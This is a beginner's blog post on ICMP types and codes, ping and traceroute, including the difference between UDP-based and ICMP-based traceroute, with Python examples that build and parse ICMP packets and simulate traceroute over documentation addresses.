In this article, I am going to share some basic information on ICMP, Ping and Trace-Route, and also show how UDP makes use of ICMP for error communication.
First things first: ICMP.
ICMP is a very simple, datagram-based protocol. Many other protocols rely upon ICMP to communicate error conditions, so it is mainly designed for error reporting and network troubleshooting. Now let's get familiar with the ICMP type and code. The ICMP Type field identifies what kind of ICMP packet is being sent, and the ICMP Code field provides more detailed information about it.
Common Types and Codes are listed below.
Type 0 - Echo Reply, which is usually the ping response. It says that the remote node is reachable over the network.
Type 3 - Destination Unreachable, which means the remote network or node is not reachable; there may be multiple reasons for that.
Btw, I have a very long story to tell about ICMP Type 3, Code 3 and an affair with SNMP, but not here :P
Type 3 ICMP uses the following codes.
- Code 0: Network Unreachable
- Code 1: Host Unreachable
- Code 3: Port Unreachable
- Code 9: Destination Network Administratively Prohibited
Consider a person sending a UDP packet to a remote destination from his machine. Assume there is a firewall on the path that blocks this UDP traffic. The firewall blocks the packet from going to the next hop towards the destination, and a "network unreachable" code is returned to the sending host. Similarly, if the firewall allows the traffic but the destination host simply doesn't exist on the network, a "host unreachable" code is returned. However, if the host does exist on the network but the requested UDP port is not an open port, a "port unreachable" code may be returned by the intermediate device.
Type 5 - Redirect, usually used to update routing tables.
Type 8 - Echo Request. When we do a ping, an ICMP Type 8 packet is sent, and the response to it is a Type 0.
Type 11 - Time Exceeded, which usually occurs during a routing loop.
There are two codes associated with Type 11.
- Code 0: TTL Expired in transit
- Code 1: TTL Expired during reassembly
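As an added example (not code from the original post), the following Python builds and decodes ICMP messages using the Type and Code values listed above, and verifies the RFC 1071 Internet checksum that every ICMP message carries; the sample packets and payload bytes are constructed here for illustration.

```python
import struct

# ICMP types and codes as listed in the post (a subset of the full registry)
ICMP_TYPES = {0: "Echo Reply", 3: "Destination Unreachable", 5: "Redirect",
              8: "Echo Request", 11: "Time Exceeded"}
ICMP_CODES = {
    3: {0: "Network Unreachable", 1: "Host Unreachable",
        3: "Port Unreachable", 9: "Destination Network Administratively Prohibited"},
    11: {0: "TTL Expired in transit", 1: "TTL Expired during reassembly"},
}

def inet_checksum(data: bytes) -> int:
    """RFC 1071 checksum: one's-complement sum of 16-bit words, then complemented."""
    if len(data) % 2:
        data += b"\x00"                       # pad odd-length data with a zero byte
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                        # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_icmp(icmp_type: int, code: int, rest: bytes = b"\x00" * 4, payload: bytes = b"") -> bytes:
    """Assemble an ICMP message: type, code, checksum, 4 'rest of header' bytes, payload."""
    body = rest + payload
    cs = inet_checksum(struct.pack("!BBH", icmp_type, code, 0) + body)
    return struct.pack("!BBH", icmp_type, code, cs) + body

def describe(icmp_type: int, code: int) -> str:
    """Human-readable name for a (type, code) pair, per the tables above."""
    name = ICMP_TYPES.get(icmp_type, "Unknown type %d" % icmp_type)
    sub = ICMP_CODES.get(icmp_type, {}).get(code)
    return "%s / %s" % (name, sub) if sub else name

def parse_icmp(packet: bytes) -> dict:
    """Decode the 8-byte ICMP header and verify the checksum over the whole message."""
    if len(packet) < 8:
        raise ValueError("ICMP message shorter than 8 bytes")
    icmp_type, code, _cs = struct.unpack("!BBH", packet[:4])
    return {
        "type": icmp_type,
        "code": code,
        "name": describe(icmp_type, code),
        "checksum_ok": inet_checksum(packet) == 0,   # an intact message sums to zero
        "payload": packet[8:],
    }

if __name__ == "__main__":
    # Constructed sample: a "port unreachable" reply carrying a dummy 28-byte IP header + UDP header
    sample = build_icmp(3, 3, payload=b"\x45\x00" + b"\x00" * 26)
    print(parse_icmp(sample))
```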
Next, let's talk about Ping.
We all use the ping command to check connectivity and reachability on the network. Ping sends multiple ICMP Echo Request packets to the remote node and waits for their replies (Echo Reply). The ping command keeps track of when it sends each Echo Request packet and when it receives the corresponding Echo Reply. The difference between those two times is the round-trip time, which is used to calculate the latency.
And finally, Trace-Route.
Trace-route maps the route, i.e. the hops through which the packet traverses to reach the destination. Let's see how trace-route actually works. The command sends a series of packets all going towards the same destination, with TTL values starting at 1. When the first packet is sent, its TTL expires at the first hop, so the router (or other intermediate device) replies with an ICMP "Destination Unreachable" or "Time Exceeded" message. The trace-route command receives this reply and looks inside the payload for the IP address of the sender, which it assumes is the first hop's router. Trace-route then sends a second packet with a TTL of 2, which will expire at the second hop, generating another ICMP reply. Trace-route now knows the second hop as well. It keeps sending packets this way, incrementing the TTL by 1 each time and getting replies from each hop, until the packet reaches the destination host.
In this way, it maps all the hops in between and helps the administrator see the actual path.
One major catch here is that Linux trace-route and Windows trace-route work differently, though they may produce similar results.
Trace-route on Linux/UNIX typically sends UDP datagrams to random high-numbered ports on the destination host.
Windows trace-route typically uses ICMP Echo Request packets. But both the Linux and Windows methods generate ICMP error messages at the routers, giving the same results. How? Remember, UDP uses ICMP for error communication.
Hope this provides a brief overview of ICMP, Ping and Trace-Route basics.
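To make the TTL-stepping procedure and the Linux-vs-Windows difference concrete, here is an added simulation (not code from the original post) of trace-route over a constructed path of routers: every router decrements the TTL and answers Type 11 / Code 0 when it hits zero, while the destination answers Type 3 / Code 3 to a UDP probe on a closed high port and Type 0 to an ICMP Echo Request. The router and destination addresses are constructed documentation addresses, and the `max_hops` bound models what happens when a routing loop keeps producing Time Exceeded replies.

```python
# Reply classes the simulated devices send back, as (ICMP type, code)
TIME_EXCEEDED = (11, 0)     # router: TTL expired in transit
PORT_UNREACHABLE = (3, 3)   # destination: UDP probe hit a closed high-numbered port
ECHO_REPLY = (0, 0)         # destination: answer to an ICMP Echo Request

def send_probe(ttl, method, routers, dst):
    """Forward one probe along the constructed path and return (replying_ip, (type, code)).

    Each router decrements the TTL; the one that brings it to 0 discards the probe
    and answers with Time Exceeded. A probe that survives the whole path is
    answered by the destination according to the probe type.
    """
    for router in routers:
        ttl -= 1
        if ttl == 0:
            return router, TIME_EXCEEDED
    if method == "udp":          # Linux/UNIX style: UDP datagram to a random high port
        return dst, PORT_UNREACHABLE
    return dst, ECHO_REPLY       # Windows style: ICMP Echo Request

def traceroute(routers, dst, method="udp", max_hops=30):
    """Return [(ttl, replying_ip, icmp_type, icmp_code), ...], stopping once dst answers."""
    hops = []
    for ttl in range(1, max_hops + 1):
        replier, (icmp_type, code) = send_probe(ttl, method, routers, dst)
        hops.append((ttl, replier, icmp_type, code))
        if replier == dst:
            break
    return hops

def hop_path(hops):
    """Just the replying addresses in order, for comparing the two methods."""
    return [h[1] for h in hops]

if __name__ == "__main__":
    # Constructed topology: three routers, then the destination (documentation addresses)
    path = ["192.0.2.1", "198.51.100.1", "198.51.100.9"]
    target = "203.0.113.7"
    for m in ("udp", "icmp"):
        for ttl, ip, t, c in traceroute(path, target, method=m):
            print(f"{m:4} ttl={ttl} {ip:14} ICMP type {t} code {c}")
```

Both methods yield the same list of router addresses; only the final reply from the destination differs, which is exactly why the two tools report the same path.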